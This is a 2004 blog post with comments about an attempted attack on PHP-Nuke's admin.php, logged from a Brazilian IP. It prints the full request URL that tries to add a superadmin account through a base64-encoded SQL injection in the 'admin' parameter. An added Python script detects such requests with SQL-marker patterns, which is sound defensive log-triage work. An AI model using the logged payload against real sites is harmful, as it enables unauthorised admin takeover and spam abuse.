April 29, 2004
php exploit for mail
Host: 200.158.71.145 (Brazil based IP)
Url: /admin.php?op=AddAuthor&add_aid=kiegera&add_name=Goda&add_pwd=playboya&add_email=r00t_System@hush.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Http Code : 404
Date: Apr 29 10:29:33
Http Version: HTTP/1.0
Size in Bytes: 777
Referer: -
Agent: Mozilla 4.0 (Linux)
Looks like our formerly Microsoft FrontPage attacking friends from Brazil are at it again. However, this time they are a bit more advanced and tried to add themselves as a user to a non-existent php install in order to send spam. Cute.
Posted by joy at April 29, 2004 10:39 AM
Me too! (Well, blog.org actually, but still) from 200.177.162.127, also Brazil...
Posted by: Harald at May 2, 2004 10:53 AM
I've noticed these visits on our site as well, also from Brazil, same script running. Actually they are looking for a security hole in PHP Nuke, which seems to have existed for a while. There's a thread in their support forums with a description of what happens once they've found a victim:
http://phpnuke.org/modules.php?name=Forums&file=viewtopic&t=2627
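A triage check for access-log entries like the one in the post, added here as an example and not part of the original post or its comments: it flags the `op=AddAuthor` and `add_radminsuper=1` parameters seen in the logged URL and decodes base64-looking values such as `admin` before looking for SQL fragments. The function names and the marker list are assumptions chosen for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Request path and query copied from the log record above.
LOGGED_URL = ("/admin.php?op=AddAuthor&add_aid=kiegera&add_name=Goda"
              "&add_pwd=playboya&add_email=r00t_System@hush.com"
              "&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox")

# Assumed heuristic: SQL fragments that have no place in a query-string value.
SQL_MARKERS = re.compile(r"union\s+select|/\*|--|'\s*or\s", re.IGNORECASE)
B64_VALUE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def try_b64(value):
    """Return the decoded text if value is printable base64, else None."""
    if not B64_VALUE.fullmatch(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def inspect_request(url):
    """List (reason, parameter, evidence) findings for one logged URL."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if parts.path.endswith("/admin.php") and params.get("op") == ["AddAuthor"]:
        findings.append(("admin-account-creation", "op", "AddAuthor"))
    if params.get("add_radminsuper") == ["1"]:
        findings.append(("superuser-flag", "add_radminsuper", "1"))
    for name, values in params.items():
        for raw in values:
            decoded = try_b64(raw)
            # Check both the raw value and its decoded form, if any.
            for form in filter(None, (raw, decoded)):
                if SQL_MARKERS.search(form):
                    findings.append(("sql-in-parameter", name, form))
    return findings


if __name__ == "__main__":
    for finding in inspect_request(LOGGED_URL):
        print(finding)
```

The 404 in the log record means the request found nothing to act on; the same check is more useful on hosts where `/admin.php` answers with a 200.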